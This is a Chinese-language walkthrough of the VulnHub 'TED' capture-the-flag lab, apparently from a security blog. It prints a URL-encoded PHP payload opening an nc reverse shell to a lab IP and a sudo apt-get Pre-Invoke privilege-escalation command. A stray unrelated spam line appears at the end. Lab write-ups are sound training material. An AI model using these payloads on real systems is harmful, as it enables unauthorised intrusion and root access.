<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    vulnhub-TED靶場過程記錄

    VSole2021-08-06 10:37:30

    靶場地址:https://download.vulnhub.com/ted/Ted.7z

    靶場設置 使用VM打開

    掃描靶場網段,得到ip地址

    訪問網址是個登陸框

    掃描目錄無果后,開始對登錄框進行探索。

    隨便輸入個密碼后,發現密碼或者密碼hash錯誤,嘗試多樣的密碼對比圖如下

    看來密碼是admin沒錯了,然后應該是hash加密后訪問。

    這里耗盡了大量的時間,得出來了結果(還是朋友做出來的,難受)

    這里使用的是sha256加密,然后加密的字符串,字符轉換大寫


    在在線網站進行大小寫轉換


    一發入魂

    獲得下一步提示

    在search存在任意文件讀取


    閱覽cookie.php發現回顯了文件

    這里有一個authenticate.php
    


    正常讀取會出現退出登陸的情況,使用php偽協議讀取到了文件

    源碼如下

    同樣的方式讀取home

    Home文件中有這么一句話

    $_SESSION['user_pref'] = $_COOKIE['user_pref'];

    任意文件讀取到sessions目錄

    第一種

    寫入一句話木馬

    鏈接蟻劍

    但是上傳不了腳本

    一時間不知道咋弄了

    第二種

    %3C?php%20exec('nc%20192.168.17.128

    %202222%20-e%20/bin/bash')%20?%3E

    反彈nc

    回到sessions哪里,因為有nc

    對shell進行升級

    SHELL=/bin/bash script -q /dev/null

    然后卡殼,最終解決如下

    記錄如下

    輸入

    sudo apt-get update -o APT::Update::Pre-Invoke::="/bin/bash -i"

    提權

    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    靶場地址:https://download.vulnhub.com/ted/Ted.7z靶場設置 使用VM打
    vulnhub之VENGEANCE的實踐
    2022-06-19 12:06:05
    今天實踐的是vulnhub的VENGEANCE鏡像, 下載地址,https://download.vulnhub.com/digitalworld/VENGEANCE.7z, 用workstation導入成功,先做端口掃描, sudo netdiscover -r 192.168.137.0/24,
    vulnhub之Five86-1的實踐
    2023-10-16 09:27:53
    vulnhub之Five86-1的實踐
    vulnhub之sar的實踐
    2023-09-04 09:33:30
    今天實踐的是vulnhub的sar鏡像,
    vulnhub之2much的實踐
    2023-08-14 09:40:07
    vulnhub之2much的實踐
    vulnhub之katana的實踐
    2023-07-24 09:41:01
    今天實踐的是vulnhub的katana鏡像,下載地址,https://download.vulnhub.c
    vulnhub之CengBox的實踐
    2023-07-17 09:23:02
    今天實踐的是vulnhub的CengBox鏡像,下載地址,https://download.vulnhub.com/cengbox/CengBox.ova,無法用workstation導入,用virtualbox導入成功,做地址掃描,sudo netdiscover -r 192.168.0.0/24,獲取到靶機地址192.168.0.185,繼續進行端口掃描,sudo nmap -sS -sV
    vulnhub之mhz_c1f的實踐
    2023-07-10 14:29:56
    今天實踐的是vulnhub的mhz_c1f鏡像,下載地址,https://download.vulnhub.com/mhzcxf/mhz_c1f.ova.zip,無法用workstation導入,用virtualbox導入成功,做地址掃描,sudo netdiscover -r 192.168.0.0/24,獲取到靶機地址192.168.0.186,繼續進行端口掃描,sudo nmap -sS -
    今天實踐的是vulnhub的devrandomCTF鏡像,下載地址,https://download.vul
    第二要找到用戶數據的提交格式及內容第三要找到驗證失敗的返回相應特征。這些信息足夠hydra進行爆破和判斷,使用hydra進行爆破。我們換一種思路,首先生成1800個0,再用msf-pattern_create生成一個200長度的字符串,再進行查找。在調試器左下角調用python腳本顯示所有模塊,選擇其中false多的選項,這里使用第二個,再在這個模塊里面搜索jmp esp指令。繼續構造payload,使用msfvenom生成paypoad。成功反彈shell,但是看起來是windows的shell,使用dir查看發現就是linux的根目錄。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类